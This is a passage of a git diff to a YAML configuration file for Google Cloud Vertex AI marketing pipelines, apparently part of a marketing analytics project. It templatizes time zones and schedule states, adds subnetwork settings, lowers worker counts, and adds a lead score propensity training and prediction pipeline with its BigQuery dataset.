user_session_event_aggregated_metrics_procedure_name: "${project_id}.feature_store.invoke_user_session_event_aggregated_metrics" + date_timezone: "UTC" # used when input_date is None and need to get current date. + lead_score_propensity_inference_preparation_procedure_name: "${project_id}.lead_score_propensity.invoke_lead_score_propensity_inference_preparation" + lead_score_propensity_training_preparation_procedure_name: "${project_id}.lead_score_propensity.invoke_lead_score_propensity_training_preparation" # This pipeline contains the configuration parameters for the value based bidding training and inference pipelines. # To deploy this pipeline to your Google Cloud project: @@ -521,11 +614,17 @@ vertex_ai: type: "tabular-workflows" schedule: # define the schedule for the pipeline - cron: "TZ=America/New_York 0 1 * * *" + cron: "TZ=${time_zone} 0 1 * * *" max_concurrent_run_count: 1 start_time: null end_time: null - state: PAUSED # possible states ACTIVE or PAUSED + # The `subnetwork` defines the subnetwork in which the pipeline will be executed. + # The default value is "default". + # Follow the guide: https://cloud.google.com/vertex-ai/docs/general/vpc-peering + subnetwork: "default" + # If you want to use the vpc network defined above, set the following flag to true + use_private_service_access: false + state: ${pipeline_configuration.value_based_bidding.training.schedule.state} # These are pipeline parameters that will be passed to the pipeline to be recompiled pipeline_parameters: project: "${project_id}" @@ -559,14 +658,19 @@ vertex_ai: data_source_bigquery_table_path: "bq://${project_id}.aggregated_vbb.aggregated_value_based_bidding_training" data_source_bigquery_table_schema: "../sql/schema/table/value_based_bidding_training_preparation.json" dataflow_service_account: "df-worker@${project_id}.iam.gserviceaccount.com" - transform_dataflow_max_num_workers: 10 - stats_and_example_gen_dataflow_max_num_workers: 10 - evaluation_dataflow_starting_num_workers: 5 - evaluation_dataflow_max_num_workers: 10 - distill_batch_predict_max_replica_count: 10 - distill_batch_predict_starting_replica_count: 10 - evaluation_batch_predict_max_replica_count: 10 - evaluation_batch_predict_starting_replica_count: 10 + transform_dataflow_max_num_workers: 2 + stats_and_example_gen_dataflow_max_num_workers: 2 + evaluation_dataflow_starting_num_workers: 4 + evaluation_dataflow_max_num_workers: 5 + distill_batch_predict_machine_type: "n1-standard-16" + distill_batch_predict_max_replica_count: 5 + distill_batch_predict_starting_replica_count: 5 + evaluation_batch_predict_max_replica_count: 5 + evaluation_batch_predict_starting_replica_count: 5 + evaluation_batch_explain_max_replica_count: 5 + evaluation_batch_explain_starting_replica_count: 5 + stage_1_num_parallel_trials: 5 + stage_2_num_parallel_trials: 5 evaluation_dataflow_disk_size_gb: 30 stats_and_example_gen_dataflow_disk_size_gb: 30 transform_dataflow_disk_size_gb: 30 @@ -596,11 +700,17 @@ vertex_ai: # For using Vertex AI Tabular Workflow use the later, for all other modeling approaches use "custom" (i.e. BQML, Scikit-learn). type: "custom" schedule: - cron: "TZ=America/New_York 0 5 * * *" + cron: "TZ=${time_zone} 0 5 * * *" max_concurrent_run_count: 1 start_time: null end_time: null - state: PAUSED # possible states ACTIVE or PAUSED + # The `subnetwork` defines the subnetwork in which the pipeline will be executed. + # The default value is "default". + # Follow the guide: https://cloud.google.com/vertex-ai/docs/general/vpc-peering + subnetwork: "default" + # If you want to use the vpc network defined above, set the following flag to true + use_private_service_access: false + state: ${pipeline_configuration.value_based_bidding.explanation.schedule.state} pipeline_parameters: project: "${project_id}" location: "${cloud_region}" @@ -635,11 +745,17 @@ vertex_ai: # For using Vertex AI Tabular Workflow use the later, for all other modeling approaches use "custom" (i.e. BQML, Scikit-learn). type: "tabular-workflows" schedule: - cron: "TZ=America/New_York 0 8 * * SAT" + cron: "TZ=${time_zone} 0 8 * * SAT" max_concurrent_run_count: 1 start_time: null end_time: null - state: PAUSED # possible states ACTIVE or PAUSED + # The `subnetwork` defines the subnetwork in which the pipeline will be executed. + # The default value is "default". + # Follow the guide: https://cloud.google.com/vertex-ai/docs/general/vpc-peering + subnetwork: "default" + # If you want to use the vpc network defined above, set the following flag to true + use_private_service_access: false + state: ${pipeline_configuration.purchase_propensity.training.schedule.state} # These are pipeline parameters that will be passed to the pipeline to be recompiled pipeline_parameters: project: "${project_id}" @@ -681,14 +797,19 @@ vertex_ai: data_source_bigquery_table_path: "bq://${project_id}.purchase_propensity.v_purchase_propensity_training_30_15_last_window" data_source_bigquery_table_schema: "../sql/schema/table/purchase_propensity_training_preparation.json" dataflow_service_account: "df-worker@${project_id}.iam.gserviceaccount.com" - transform_dataflow_max_num_workers: 10 - stats_and_example_gen_dataflow_max_num_workers: 10 - evaluation_dataflow_starting_num_workers: 5 - evaluation_dataflow_max_num_workers: 10 - distill_batch_predict_max_replica_count: 10 - distill_batch_predict_starting_replica_count: 10 - evaluation_batch_predict_max_replica_count: 10 - evaluation_batch_predict_starting_replica_count: 10 + transform_dataflow_max_num_workers: 2 + stats_and_example_gen_dataflow_max_num_workers: 2 + evaluation_dataflow_starting_num_workers: 4 + evaluation_dataflow_max_num_workers: 5 + distill_batch_predict_machine_type: "n1-standard-16" + distill_batch_predict_max_replica_count: 5 + distill_batch_predict_starting_replica_count: 5 + evaluation_batch_predict_max_replica_count: 5 + evaluation_batch_predict_starting_replica_count: 5 + evaluation_batch_explain_max_replica_count: 5 + evaluation_batch_explain_starting_replica_count: 5 + stage_1_num_parallel_trials: 5 + stage_2_num_parallel_trials: 5 evaluation_dataflow_disk_size_gb: 30 stats_and_example_gen_dataflow_disk_size_gb: 30 transform_dataflow_disk_size_gb: 30 @@ -730,11 +851,17 @@ vertex_ai: # For using Vertex AI Tabular Workflow use the later, for all other modeling approaches use "custom" (i.e. BQML, Scikit-learn). type: "custom" schedule: - cron: "TZ=America/New_York 0 5 * * *" + cron: "TZ=${time_zone} 0 5 * * *" max_concurrent_run_count: 1 start_time: null end_time: null - state: PAUSED # possible states ACTIVE or PAUSED + # The `subnetwork` defines the subnetwork in which the pipeline will be executed. + # The default value is "default". + # Follow the guide: https://cloud.google.com/vertex-ai/docs/general/vpc-peering + subnetwork: "default" + # If you want to use the vpc network defined above, set the following flag to true + use_private_service_access: false + state: ${pipeline_configuration.purchase_propensity.prediction.schedule.state} pipeline_parameters: project_id: "${project_id}" location: "${cloud_region}" @@ -762,7 +889,7 @@ vertex_ai: positive_label: "1" # THese are parameters to trigger the Activation Application Dataflow. pubsub_activation_topic: "activation-trigger" - pubsub_activation_type: "purchase-propensity-30-15" # purchase-propensity-30-15 | purchase-propensity-15-15 | purchase-propensity-15-7" + pubsub_activation_type: "purchase-propensity-vbb-30-15" # purchase-propensity-30-15 | purchase-propensity-vbb-30-15 | purchase-propensity-15-15 | purchase-propensity-15-7" pipeline_parameters_substitutions: null # This pipeline contains the configuration parameters for the churn propensity training and inference pipelines for the churn propensity model. @@ -785,11 +912,19 @@ vertex_ai: # For using Vertex AI Tabular Workflow use the later, for all other modeling approaches use "custom" (i.e. BQML, Scikit-learn). type: "tabular-workflows" schedule: - cron: "TZ=America/New_York 0 8 * * SAT" + cron: "TZ=${time_zone} 0 8 * * SAT" max_concurrent_run_count: 1 start_time: null end_time: null - state: PAUSED # possible states ACTIVE or PAUSED + # The `subnetwork` defines the subnetwork in which the pipeline will be executed. + # The default value is "default". + # Follow the guide: https://cloud.google.com/vertex-ai/docs/general/vpc-peering + subnetwork: "default" + # If you want to use the vpc network defined above, set the following flag to true + use_private_service_access: false + # The `state` defines the state of the pipeline. + # In case you don't want to schedule the pipeline, set the state to `PAUSED`. + state: ${pipeline_configuration.churn_propensity.training.schedule.state} # These are pipeline parameters that will be passed to the pipeline to be recompiled pipeline_parameters: project: "${project_id}" @@ -831,14 +966,19 @@ vertex_ai: data_source_bigquery_table_path: "bq://${project_id}.churn_propensity.v_churn_propensity_training_30_30_last_window" data_source_bigquery_table_schema: "../sql/schema/table/churn_propensity_training_preparation.json" dataflow_service_account: "df-worker@${project_id}.iam.gserviceaccount.com" - transform_dataflow_max_num_workers: 10 - stats_and_example_gen_dataflow_max_num_workers: 10 - evaluation_dataflow_starting_num_workers: 5 - evaluation_dataflow_max_num_workers: 10 - distill_batch_predict_max_replica_count: 10 - distill_batch_predict_starting_replica_count: 10 - evaluation_batch_predict_max_replica_count: 10 - evaluation_batch_predict_starting_replica_count: 10 + transform_dataflow_max_num_workers: 2 + stats_and_example_gen_dataflow_max_num_workers: 2 + evaluation_dataflow_starting_num_workers: 4 + evaluation_dataflow_max_num_workers: 5 + distill_batch_predict_machine_type: "n1-standard-16" + distill_batch_predict_max_replica_count: 5 + distill_batch_predict_starting_replica_count: 5 + evaluation_batch_predict_max_replica_count: 5 + evaluation_batch_predict_starting_replica_count: 5 + evaluation_batch_explain_max_replica_count: 5 + evaluation_batch_explain_starting_replica_count: 5 + stage_1_num_parallel_trials: 5 + stage_2_num_parallel_trials: 5 evaluation_dataflow_disk_size_gb: 30 stats_and_example_gen_dataflow_disk_size_gb: 30 transform_dataflow_disk_size_gb: 30 @@ -880,11 +1020,19 @@ vertex_ai: # For using Vertex AI Tabular Workflow use the later, for all other modeling approaches use "custom" (i.e. BQML, Scikit-learn). type: "custom" schedule: - cron: "TZ=America/New_York 0 5 * * *" + cron: "TZ=${time_zone} 0 5 * * *" max_concurrent_run_count: 1 start_time: null end_time: null - state: PAUSED # possible states ACTIVE or PAUSED + # The `subnetwork` defines the subnetwork in which the pipeline will be executed. + # The default value is "default". + # Follow the guide: https://cloud.google.com/vertex-ai/docs/general/vpc-peering + subnetwork: "default" + # If you want to use the vpc network defined above, set the following flag to true + use_private_service_access: false + # The `state` defines the state of the pipeline. + # In case you don't want to schedule the pipeline, set the state to `PAUSED`. + state: ${pipeline_configuration.churn_propensity.prediction.schedule.state} pipeline_parameters: project_id: "${project_id}" location: "${cloud_region}" @@ -935,11 +1083,19 @@ vertex_ai: # For using Vertex AI Tabular Workflow use the later, for all other modeling approaches use "custom" (i.e. BQML, Scikit-learn). type: "custom" schedule: - cron: "TZ=America/New_York 0 12 * * SAT" + cron: "TZ=${time_zone} 0 12 * * SAT" max_concurrent_run_count: 1 start_time: null end_time: null - state: PAUSED # possible states ACTIVE or PAUSED + # The `subnetwork` defines the subnetwork in which the pipeline will be executed. + # The default value is "default". + # Follow the guide: https://cloud.google.com/vertex-ai/docs/general/vpc-peering + subnetwork: "default" + # If you want to use the vpc network defined above, set the following flag to true + use_private_service_access: false + # The `state` defines the state of the pipeline. + # In case you don't want to schedule the pipeline, set the state to `PAUSED`. + state: ${pipeline_configuration.segmentation.training.schedule.state} # These are pipeline parameters that will be passed to the pipeline to be compiled # For Demographics Audience Segmentation model, we use the BQML KMeans clustering algorithm. # Check the official documentation for better understanding the algorithm @@ -978,11 +1134,19 @@ vertex_ai: # For using Vertex AI Tabular Workflow use the later, for all other modeling approaches use "custom" (i.e. BQML, Scikit-learn). type: "custom" schedule: - cron: "TZ=America/New_York 0 7 * * *" + cron: "TZ=${time_zone} 0 7 * * *" max_concurrent_run_count: 1 start_time: null end_time: null - state: PAUSED # possible states ACTIVE or PAUSED + # The `subnetwork` defines the subnetwork in which the pipeline will be executed. + # The default value is "default". + # Follow the guide: https://cloud.google.com/vertex-ai/docs/general/vpc-peering + subnetwork: "default" + # If you want to use the vpc network defined above, set the following flag to true + use_private_service_access: false + # The `state` defines the state of the pipeline. + # In case you don't want to schedule the pipeline, set the state to `PAUSED`. + state: ${pipeline_configuration.segmentation.prediction.schedule.state} pipeline_parameters: project_id: "${project_id}" location: "${location}" @@ -1024,11 +1188,19 @@ vertex_ai: # For using Vertex AI Tabular Workflow use the later, for all other modeling approaches use "custom" (i.e. BQML, Scikit-learn). type: "custom" schedule: - cron: "TZ=America/New_York 0 12 * * SAT" + cron: "TZ=${time_zone} 0 12 * * SAT" max_concurrent_run_count: 1 start_time: null end_time: null - state: PAUSED # possible states ACTIVE or PAUSED + # The `subnetwork` defines the subnetwork in which the pipeline will be executed. + # The default value is "default". + # Follow the guide: https://cloud.google.com/vertex-ai/docs/general/vpc-peering + subnetwork: "default" + # If you want to use the vpc network defined above, set the following flag to true + use_private_service_access: false + # The `state` defines the state of the pipeline. + # In case you don't want to schedule the pipeline, set the state to `PAUSED`. + state: ${pipeline_configuration.auto_segmentation.training.schedule.state} # These are pipeline parameters that will be passed to the pipeline to be compiled # For Interest based Auto Audience Segmentation model, we use the BQML KMeans clustering algorithm. # Check the official documentation for better understanding the algorithm @@ -1066,11 +1238,19 @@ vertex_ai: # For using Vertex AI Tabular Workflow use the later, for all other modeling approaches use "custom" (i.e. BQML, Scikit-learn). type: "custom" schedule: - cron: "TZ=America/New_York 0 7 * * *" + cron: "TZ=${time_zone} 0 7 * * *" max_concurrent_run_count: 1 start_time: null end_time: null - state: PAUSED # possible states ACTIVE or PAUSED + # The `subnetwork` defines the subnetwork in which the pipeline will be executed. + # The default value is "default". + # Follow the guide: https://cloud.google.com/vertex-ai/docs/general/vpc-peering + subnetwork: "default" + # If you want to use the vpc network defined above, set the following flag to true + use_private_service_access: false + # The `state` defines the state of the pipeline. + # In case you don't want to schedule the pipeline, set the state to `PAUSED`. + state: ${pipeline_configuration.auto_segmentation.prediction.schedule.state} pipeline_parameters: project_id: "${project_id}" location: "${location}" @@ -1115,11 +1295,19 @@ vertex_ai: # For using Vertex AI Tabular Workflow use the later, for all other modeling approaches use "custom" (i.e. BQML, Scikit-learn). type: "tabular-workflows" schedule: - cron: "TZ=America/New_York 0 16 * * SAT" + cron: "TZ=${time_zone} 0 16 * * SAT" max_concurrent_run_count: 1 start_time: null end_time: null - state: PAUSED # possible states ACTIVE or PAUSED + # The `subnetwork` defines the subnetwork in which the pipeline will be executed. + # The default value is "default". + # Follow the guide: https://cloud.google.com/vertex-ai/docs/general/vpc-peering + subnetwork: "default" + # If you want to use the vpc network defined above, set the following flag to true + use_private_service_access: false + # The `state` defines the state of the pipeline. + # In case you don't want to schedule the pipeline, set the state to `PAUSED`. + state: ${pipeline_configuration.propensity_clv.training.schedule.state} # These are pipeline parameters that will be passed to the pipeline to be recompiled pipeline_parameters: project: "${project_id}" @@ -1160,14 +1348,19 @@ vertex_ai: data_source_bigquery_table_path: "bq://${project_id}.purchase_propensity.v_purchase_propensity_training_30_30_last_window" data_source_bigquery_table_schema: "../sql/schema/table/purchase_propensity_training_preparation.json" dataflow_service_account: "df-worker@${project_id}.iam.gserviceaccount.com" - transform_dataflow_max_num_workers: 10 - stats_and_example_gen_dataflow_max_num_workers: 10 - evaluation_dataflow_starting_num_workers: 5 - evaluation_dataflow_max_num_workers: 10 - distill_batch_predict_max_replica_count: 10 - distill_batch_predict_starting_replica_count: 10 - evaluation_batch_predict_max_replica_count: 10 - evaluation_batch_predict_starting_replica_count: 10 + transform_dataflow_max_num_workers: 2 + stats_and_example_gen_dataflow_max_num_workers: 2 + evaluation_dataflow_starting_num_workers: 4 + evaluation_dataflow_max_num_workers: 5 + distill_batch_predict_machine_type: "n1-standard-16" + distill_batch_predict_max_replica_count: 5 + distill_batch_predict_starting_replica_count: 5 + evaluation_batch_predict_max_replica_count: 5 + evaluation_batch_predict_starting_replica_count: 5 + evaluation_batch_explain_max_replica_count: 5 + evaluation_batch_explain_starting_replica_count: 5 + stage_1_num_parallel_trials: 5 + stage_2_num_parallel_trials: 5 evaluation_dataflow_disk_size_gb: 30 stats_and_example_gen_dataflow_disk_size_gb: 30 transform_dataflow_disk_size_gb: 30 @@ -1226,11 +1419,19 @@ vertex_ai: # For using Vertex AI Tabular Workflow use the later, for all other modeling approaches use "custom" (i.e. BQML, Scikit-learn). type: "tabular-workflows" schedule: - cron: "TZ=America/New_York 0 20 * * SAT" + cron: "TZ=${time_zone} 0 20 * * SAT" max_concurrent_run_count: 1 start_time: null end_time: null - state: PAUSED # possible states ACTIVE or PAUSED + # The `subnetwork` defines the subnetwork in which the pipeline will be executed. + # The default value is "default". + # Follow the guide: https://cloud.google.com/vertex-ai/docs/general/vpc-peering + subnetwork: "default" + # If you want to use the vpc network defined above, set the following flag to true + use_private_service_access: false + # The `state` defines the state of the pipeline. + # In case you don't want to schedule the pipeline, set the state to `PAUSED`. + state: ${pipeline_configuration.clv.training.schedule.state} # These are pipeline parameters that will be passed to the pipeline to be recompiled pipeline_parameters: project: "${project_id}" @@ -1268,14 +1469,19 @@ vertex_ai: data_source_bigquery_table_path: "bq://${project_id}.customer_lifetime_value.v_customer_lifetime_value_training_180_30_last_window" data_source_bigquery_table_schema: "../sql/schema/table/customer_lifetime_value_training_preparation.json" dataflow_service_account: "df-worker@${project_id}.iam.gserviceaccount.com" - transform_dataflow_max_num_workers: 10 - stats_and_example_gen_dataflow_max_num_workers: 10 - evaluation_dataflow_starting_num_workers: 5 - evaluation_dataflow_max_num_workers: 10 - distill_batch_predict_max_replica_count: 10 - distill_batch_predict_starting_replica_count: 10 - evaluation_batch_predict_max_replica_count: 10 - evaluation_batch_predict_starting_replica_count: 10 + transform_dataflow_max_num_workers: 2 + stats_and_example_gen_dataflow_max_num_workers: 2 + evaluation_dataflow_starting_num_workers: 4 + evaluation_dataflow_max_num_workers: 5 + distill_batch_predict_machine_type: "n1-standard-16" + distill_batch_predict_max_replica_count: 5 + distill_batch_predict_starting_replica_count: 5 + evaluation_batch_predict_max_replica_count: 5 + evaluation_batch_predict_starting_replica_count: 5 + evaluation_batch_explain_max_replica_count: 5 + evaluation_batch_explain_starting_replica_count: 5 + stage_1_num_parallel_trials: 5 + stage_2_num_parallel_trials: 5 evaluation_dataflow_disk_size_gb: 30 stats_and_example_gen_dataflow_disk_size_gb: 30 transform_dataflow_disk_size_gb: 30 @@ -1314,11 +1520,19 @@ vertex_ai: # For using Vertex AI Tabular Workflow use the later, for all other modeling approaches use "custom" (i.e. BQML, Scikit-learn). type: "custom" schedule: - cron: "TZ=America/New_York 0 6 * * *" + cron: "TZ=${time_zone} 0 6 * * *" max_concurrent_run_count: 1 start_time: null end_time: null - state: PAUSED # possible states ACTIVE or PAUSED + # The `subnetwork` defines the subnetwork in which the pipeline will be executed. + # The default value is "default". + # Follow the guide: https://cloud.google.com/vertex-ai/docs/general/vpc-peering + subnetwork: "default" + # If you want to use the vpc network defined above, set the following flag to true + use_private_service_access: false + # The `state` defines the state of the pipeline. + # In case you don't want to schedule the pipeline, set the state to `PAUSED`. + state: ${pipeline_configuration.clv.prediction.schedule.state} # These are the pipeline parameters to be used in this convoluted prediction pipeline that takes predictions from LTV model and purchase propensity model. pipeline_parameters: project_id: "${project_id}" @@ -1342,7 +1556,7 @@ vertex_ai: # The `purchase_model_metric_threshold` parameter defines what is the maximum acceptable value for the `purchase_model_metric_name` so that the model can be selected. # If the actual models metrics values are higher than this limit, no models will be selected and the pipeline is going to fail. clv_model_metric_name: "meanAbsoluteError" #'rootMeanSquaredError', 'meanAbsoluteError', 'meanAbsolutePercentageError', 'rSquared', 'rootMeanSquaredLogError' - clv_model_metric_threshold: 400 + clv_model_metric_threshold: 600 number_of_clv_models_considered: 1 # This is the prediction dataset table or view for the purchase model. purchase_bigquery_source: "${project_id}.purchase_propensity.v_purchase_propensity_inference_30_30" @@ -1363,6 +1577,173 @@ vertex_ai: pubsub_activation_type: "cltv-180-30" # cltv-180-180 | cltv-180-90 | cltv-180-30 pipeline_parameters_substitutions: null + # This pipeline contains the configuration parameters for the propensity training and inference pipelines for the lead score propensity model. + # To deploy this pipeline to your Google Cloud project: + ## 1. Define the pipeline parameters below, following YAML format + ## 2. Define the bigquery or Vertex AI KFP components to be used by your pipeline in `python/pipelines` section, if applicable. + ## 3. Define or reuse the pipeline definition method to be used to compile the pipeline into a YAML file in `python/pipelines` section. + ## 5. Create the terraform resources to compile, upload and schedule the pipeline in `terraform/pipelines/pipelines.tf` + ## 6. Define python function that perform `compilation` and `upload to GCS bucket` are defined in `python/pipelines/compiler.py` and `python/pipelines/uploader.py`. + ## 7. Define python function that perform `schedule` of the pipeline is defined in `python/pipelines/scheduler.py`. + ## 9. Run terraform apply + ## Note: For `type` = "tabular workflows", the pre-compiled YAML file `automl_tabular_pl_v4.yaml` is recompiled by parsing the `pipeline_parameters` below as default values + ## to the the new YAML file. The recompiled YAML will be uploaded and scheduled in Vertex AI Pipelines. + lead_score_propensity: + training: + name: "lead-score-propensity-training-pl" + job_id_prefix: "lead-score-propensity-training-pl-" + experiment_name: "lead-score-propensity-training" + # `type` can be "custom" or "tabular-workflows". + # For using Vertex AI Tabular Workflow use the later, for all other modeling approaches use "custom" (i.e. BQML, Scikit-learn). + type: "tabular-workflows" + schedule: + cron: "TZ=${time_zone} 0 8 * * SAT" + max_concurrent_run_count: 1 + start_time: null + end_time: null + # The `subnetwork` defines the subnetwork in which the pipeline will be executed. + # The default value is "default". + # Follow the guide: https://cloud.google.com/vertex-ai/docs/general/vpc-peering + subnetwork: "default" + # If you want to use the vpc network defined above, set the following flag to true + use_private_service_access: false + state: ${pipeline_configuration.lead_score_propensity.training.schedule.state} + # These are pipeline parameters that will be passed to the pipeline to be recompiled + pipeline_parameters: + project: "${project_id}" + location: "${cloud_region}" + root_dir: "gs://${project_id}-pipelines/lead-score-propensity-training" + transformations: "gs://${project_id}-pipelines/lead-score-propensity-training/transformations_config_{timestamp}.json" + # These are specific data types transformations that will be applied to the dataset. + custom_transformations: "pipelines/transformations-lead-score-propensity.json" + train_budget_milli_node_hours: 100 # 1000 = 1 hour + # Set these to apply feature selection tuning. + max_selected_features: 20 + apply_feature_selection_tuning: true + run_evaluation: true + run_distillation: false + # The Lead Score Propensity model name + model_display_name: "lead-score-propensity-model" + # The Lead Score Propensity model description + model_description: "Lead Score Propensity Classification AutoML Model" + # Use `prediction_type` to "regression" for training models that predict a numerical value. For classification models, use "classification" and you will + # also get the probability likelihood for that class. + prediction_type: "classification" + # The optimization objectives may change depending on the `prediction_type`. + # For binary classification, use "maximize-au-roc", "minimize-log-loss", "maximize-au-prc", "maximize-precision-at-recall" or "maximize-recall-at-precision". + # For multi class classification, use "minimize-log-loss". + # For regression, use "minimize-rmse", "minimize-mae", or "minimize-rmsle". + optimization_objective: "maximize-au-roc" # maximize-precision-at-recall, maximize-au-prc, maximize-au-roc, minimize-log-loss, maximize-recall-at-precision + #Don't use when parameter `optimization_objective` is not `maximize-precision-at-recall` or `maximize-recall-at-precision` + #optimization_objective_recall_value: 0.72 + #optimization_objective_precision_value: 0.72 + target_column: "will_login" + predefined_split_key: "data_split" + data_source_csv_filenames: null + training_fraction: null + validation_fraction: null + test_fraction: null + # This is the training dataset provided during the training routine. + # The schema in this table or view must match the schema in the json files. + # Take into consideration the `excluded_features` list below. They won't be used for training. + data_source_bigquery_table_path: "bq://${project_id}.lead_score_propensity.v_lead_score_propensity_training_5_1_last_window" + data_source_bigquery_table_schema: "../sql/schema/table/lead_score_propensity_training_preparation.json" + dataflow_service_account: "df-worker@${project_id}.iam.gserviceaccount.com" + transform_dataflow_max_num_workers: 2 + stats_and_example_gen_dataflow_max_num_workers: 2 + evaluation_dataflow_starting_num_workers: 4 + evaluation_dataflow_max_num_workers: 5 + distill_batch_predict_machine_type: "n1-standard-16" + distill_batch_predict_max_replica_count: 5 + distill_batch_predict_starting_replica_count: 5 + evaluation_batch_predict_max_replica_count: 5 + evaluation_batch_predict_starting_replica_count: 5 + evaluation_batch_explain_max_replica_count: 5 + evaluation_batch_explain_starting_replica_count: 5 + stage_1_num_parallel_trials: 5 + stage_2_num_parallel_trials: 5 + evaluation_dataflow_disk_size_gb: 30 + stats_and_example_gen_dataflow_disk_size_gb: 30 + transform_dataflow_disk_size_gb: 30 + timestamp_split_key: null + stratified_split_key: null + weight_column: null + additional_experiments: null + export_additional_model_without_custom_ops: false + # Override the study spec parameters in case you want to restrict hyperparameter search space. Including `model_type`. + # In this case, for Value Based Bidding, we're looking for a perfect fit using a tree based model. + # Don't use when parameter `apply_feature_selection_tuning` is `true` + #study_spec_parameters_override: + # - parameter_id: "model_type" + # categorical_value_spec: + # values: + # - nn + # - boosted_trees + # - parameter_id: "feature_selection_rate" + # double_value_spec: + # min_value: 0.5 + # max_value: 1.0 + # scale_type: UNIT_LINEAR_SCALE + # Features to be excluded from the training dataset. + exclude_features: + - processed_timestamp + - data_split + #- feature_date + - user_pseudo_id + - user_id + - device_web_browser_version + - device_os_version + - will_login + pipeline_parameters_substitutions: null + prediction: + name: "lead-score-propensity-prediction-pl" + job_id_prefix: "lead-score-propensity-prediction-pl-" + experiment_name: "lead-score-propensity-prediction" + # `type` can be "custom" or "tabular-workflows". + # For using Vertex AI Tabular Workflow use the later, for all other modeling approaches use "custom" (i.e. BQML, Scikit-learn). + type: "custom" + schedule: + cron: "TZ=${time_zone} 0 5 * * *" + max_concurrent_run_count: 1 + start_time: null + end_time: null + # The `subnetwork` defines the subnetwork in which the pipeline will be executed. + # The default value is "default". + # Follow the guide: https://cloud.google.com/vertex-ai/docs/general/vpc-peering + subnetwork: "default" + # If you want to use the vpc network defined above, set the following flag to true + use_private_service_access: false + state: ${pipeline_configuration.lead_score_propensity.prediction.schedule.state} + pipeline_parameters: + project_id: "${project_id}" + location: "${cloud_region}" + job_name_prefix: "lead-score-propensity-prediction-pl-" + # The Lead Score Propensity model name to be used for prediction + model_display_name: "lead-score-propensity-model" + model_metric_name: "logLoss" + # The `model_metric_threshold` parameter defines what is the maximum acceptable value for the `model_metric_name` so that the model can be selected. + # If the actual models metrics values are higher than this limit, no models will be selected and the pipeline is going to fail. + model_metric_threshold: 0.9 + number_of_models_considered: 1 + # This is the prediction dataset table or view. + bigquery_source: "${project_id}.lead_score_propensity.v_lead_score_propensity_inference_5_1" + bigquery_destination_prefix: "${project_id}.lead_score_propensity" + bq_unique_key: "user_pseudo_id" + machine_type: "n1-standard-4" + max_replica_count: 10 + batch_size: 64 + accelerator_count: 0 + accelerator_type: "ACCELERATOR_TYPE_UNSPECIFIED" # ONE OF ACCELERATOR_TYPE_UNSPECIFIED, NVIDIA_TESLA_K80, NVIDIA_TESLA_P100, NVIDIA_TESLA_V100, NVIDIA_TESLA_P4, NVIDIA_TESLA_T4 + generate_explanation: false + # This is the probability value that will tell the condition to slit into the two classes. + # For probabilities higher than `threashold`, set postive label to 1, otherwise 0. + threashold: 0.5 + positive_label: "1" + # THese are parameters to trigger the Activation Application Dataflow. + pubsub_activation_topic: "activation-trigger" + pubsub_activation_type: "lead-score-propensity-5-1" # lead-score-propensity-5-1 + pipeline_parameters_substitutions: null + # This pipeline contains the configuration parameters for the feature creation pipeline for the audience segmentation model. # This block defines the pipeline parameters that are going to be used for three tasks: compilation, upload and scheduling. # To deploy this pipeline to your Google Cloud project: @@ -1392,14 +1773,20 @@ vertex_ai: schedule: # The `cron` is the cron schedule. Make sure you review the TZ=America/New_York timezone. # More information can be found at https://cloud.google.com/scheduler/docs/configuring/cron-job-schedules. - cron: "TZ=America/New_York 0 8-23/2 * * *" + cron: "TZ=${time_zone} 0 8-23/2 * * *" # The `max_concurrent_run_count` defines the maximum number of concurrent pipeline runs. max_concurrent_run_count: 1 start_time: null end_time: null + # The `subnetwork` defines the subnetwork in which the pipeline will be executed. + # The default value is "default". + # Follow the guide: https://cloud.google.com/vertex-ai/docs/general/vpc-peering + subnetwork: "default" + # If you want to use the vpc network defined above, set the following flag to true + use_private_service_access: false # The `state` defines the state of the pipeline. # In case you don't want to schedule the pipeline, set the state to `PAUSED`. - state: PAUSED # possible states ACTIVE or PAUSED + state: ${pipeline_configuration.reporting_preparation.execution.schedule.state} # possible states ACTIVE or PAUSED # The `pipeline_parameters` defines the parameters that are going to be used to compile the pipeline. # Those values may difer depending on the pipeline type and the pipeline steps being used. # Make sure you review the python function the defines the pipeline. @@ -1450,14 +1837,20 @@ vertex_ai: schedule: # The `cron` is the cron schedule. Make sure you review the TZ=America/New_York timezone. # More information can be found at https://cloud.google.com/scheduler/docs/configuring/cron-job-schedules. - cron: "TZ=America/New_York 0 8 * * *" + cron: "TZ=${time_zone} 0 8 * * *" # The `max_concurrent_run_count` defines the maximum number of concurrent pipeline runs. max_concurrent_run_count: 1 start_time: null end_time: null + # The `subnetwork` defines the subnetwork in which the pipeline will be executed. + # The default value is "default". + # Follow the guide: https://cloud.google.com/vertex-ai/docs/general/vpc-peering + subnetwork: "default" + # If you want to use the vpc network defined above, set the following flag to true + use_private_service_access: false # The `state` defines the state of the pipeline. # In case you don't want to schedule the pipeline, set the state to `PAUSED`. - state: PAUSED # possible states ACTIVE or PAUSED + state: ${pipeline_configuration.gemini_insights.execution.schedule.state} # possible states ACTIVE or PAUSED # The `pipeline_parameters` defines the parameters that are going to be used to compile the pipeline. # Those values may difer depending on the pipeline type and the pipeline steps being used. # Make sure you review the python function the defines the pipeline. @@ -1586,6 +1979,18 @@ bigquery: description: "Dataset with gemini_insights results from multiple use cases" friendly_name: "Gemini Insights Dataset" max_time_travel_hours: 168 + # Dataset for the lead score propensity use case. + lead_score_propensity: + name: "lead_score_propensity" + location: "${location}" + project_id: "${project_id}" + collation: "und:ci" + is_case_insensitive: TRUE + description: "Lead Score Propensity Use Case dataset for Marketing behavioural modeling" + friendly_name: "Lead Score Propensity Dataset" + max_time_travel_hours: 168 + default_partition_expiration_days: 365 + default_table_expiration_days: 365 table: # Table containing the feature engineered dataset that will be used for the Audience Segmentation prediction pipeline. audience_segmentation_inference_preparation: @@ -1622,6 +2027,13 @@ bigquery: table_name: "churn_propensity_inference_preparation" location: "${location}" table_description: "Purchase Propensity Inference Preparation table to be used for Model Prediction" + # Table containing the feature engineered dataset that will be used for the Lead Score Propensity prediction pipeline. + lead_score_propensity_inference_preparation: + project_id: "${project_id}" + dataset: "lead_score_propensity" + table_name: "lead_score_propensity_inference_preparation" + location: "${location}" + table_description: "Lead Score Propensity Inference Preparation table to be used for Model Prediction" # Table containing the feature engineered labels that will be used for the Purchase Propensity training pipeline. purchase_propensity_label: project_id: "${project_id}" @@ -1629,13 +2041,20 @@ bigquery: table_name: "purchase_propensity_label" location: "${location}" table_description: "Purchase Propensity Label table to be used for Model Prediction" - # Table containing the feature engineered labels that will be used for the Purchase Propensity training pipeline. + # Table containing the 